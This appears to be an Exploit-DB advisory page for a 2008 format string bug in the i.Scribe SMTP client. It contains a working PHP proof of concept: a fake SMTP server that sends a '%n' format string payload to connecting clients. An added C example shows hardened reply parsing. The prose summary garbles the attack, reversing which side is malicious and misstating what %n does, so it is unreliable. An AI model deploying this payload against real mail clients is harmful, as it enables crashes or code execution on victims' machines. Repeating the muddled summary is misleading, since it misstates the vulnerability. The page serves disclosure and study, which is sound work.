Vendor: i.Scribe smtp client
By: Alfons Luja
CVSS: 7.5 (HIGH)
Title: Format String (wscanf) bug
CWE: 134
Product Name: i.Scribe smtp client
Affected Version From: 1.88
Affected Version To: 2.00 beta
Patch Exists: Yes
Related CWE: N/A
CPE: a:memecode:iscribe_smtp_client
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

i.Scribe smtp client v 1.88 to 2.00 beta Format String (wscanf) bug p0c

This vulnerability is a Format String (wscanf) bug in i.Scribe smtp client v 1.88 to 2.00 beta. It allows an attacker to execute arbitrary code on the vulnerable system. The attacker must first enable the php_sockets.dll extension in php.ini or open a netcat listener on port 25. The attacker then connects to the vulnerable system using the i.Scribe smtp client and sends a malicious string containing the %n format specifier. This will cause the vulnerable system to write the address of the stack frame to the stack, allowing the attacker to overwrite the return address and execute arbitrary code.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of i.Scribe smtp client.
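For code that has to read SMTP replies safely, the defensive counterpart of this bug class is sketched below. It is an added example, not code from i.Scribe or from the original advisory. The page does not show the client's source, so the vulnerable call in the comment is an assumed illustration, and `parse_smtp_reply` and `format_log` are hypothetical names.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* ASSUMED vulnerable pattern (comment only, never compiled):
 *     swscanf(input, reply_from_server, &a, &b);  // network data as FORMAT
 * Every %n in the reply then stores a count through whatever value sits
 * in the matching argument slot. */

/* Hardened: the reply is only ever DATA. Returns the 3-digit reply code,
 * or -1 unless the line is "DDD" followed by ' ', '-' or end of line.
 * The text is copied byte for byte, so "%n" stays two inert characters. */
int parse_smtp_reply(const char *line, char *text, size_t text_sz)
{
    if (text_sz == 0) return -1;
    text[0] = '\0';
    for (int i = 0; i < 3; i++)          /* stops at NUL on short input */
        if (!isdigit((unsigned char)line[i])) return -1;
    if (!strchr(" -\r\n", line[3])) return -1;   /* also accepts NUL */
    int code = (line[0] - '0') * 100 + (line[1] - '0') * 10 + (line[2] - '0');
    if (code < 200 || code > 599) return -1;     /* SMTP uses 2yz..5yz */
    const char *p = line + 3;
    if (*p == ' ' || *p == '-') p++;
    size_t n = strcspn(p, "\r\n");
    if (n >= text_sz) n = text_sz - 1;           /* truncate, never overflow */
    memcpy(text, p, n);
    text[n] = '\0';
    return code;
}

/* Logging uses a constant format; server text goes in only as a %s argument. */
int format_log(char *out, size_t sz, const char *line)
{
    char text[128];
    int code = parse_smtp_reply(line, text, sizeof text);
    if (code < 0) return snprintf(out, sz, "rejected malformed reply");
    return snprintf(out, sz, "server said: %d %s", code, text);
}

int main(void)
{
    char log[160];
    format_log(log, sizeof log, "AAAA%n%n%n%n%n%n%n%n%n"); /* string from the PoC */
    puts(log);
    format_log(log, sizeof log, "220 mx.example ESMTP %n ready\r\n"); /* constructed */
    puts(log);
    return 0;
}
```

Building with `-Wformat -Wformat-security` (GCC/Clang) flags calls where a non-literal string is passed as the format argument.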
Source

Exploit-DB raw data:

<?php 
//I dont have c lol
/*___=++++++++++++__=--=________*****
 0-- 
  --  i.Scribe smtp client v 1.88 to 2.00 beta
      Format String (wscanf) bug p0c
      vendor : Memecode Software 
      grTs;SiD.psycho 
      A.Luja 27.11.08  

--)(________++++++++++++++++++++---*** 

___00)_- NOTE!!! you must enable extension=php_sockets.dll in php.ini ___==
          Or just open nc -l -p 25 lol*/
$host= $_SERVER['SERVER_ADDR']; // array key must be a quoted string
$port= 25;
$ret = "AAAA%n%n%n%n%n%n%n%n%n";
$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die ("socket error\n"); 
$bind = socket_bind ($socket, $host, $port) or die ("bind error\n"); 
$listen = socket_listen($socket,1) or die("listen error\n");
printf("--==Fake smtp server ready==----\n");
printf("Now connect here with iScribe client\n");
if(($acp=socket_accept($socket))!==false){
    printf("Target connected\n");
    sleep(2);
    printf("send evil char\n");
    $hello=socket_write($acp,$ret,strlen($ret));  
    printf("done\n");
    socket_close($acp);
}
socket_close($socket);
exit();
?>

//Alfons Luja

# milw0rm.com [2008-11-27]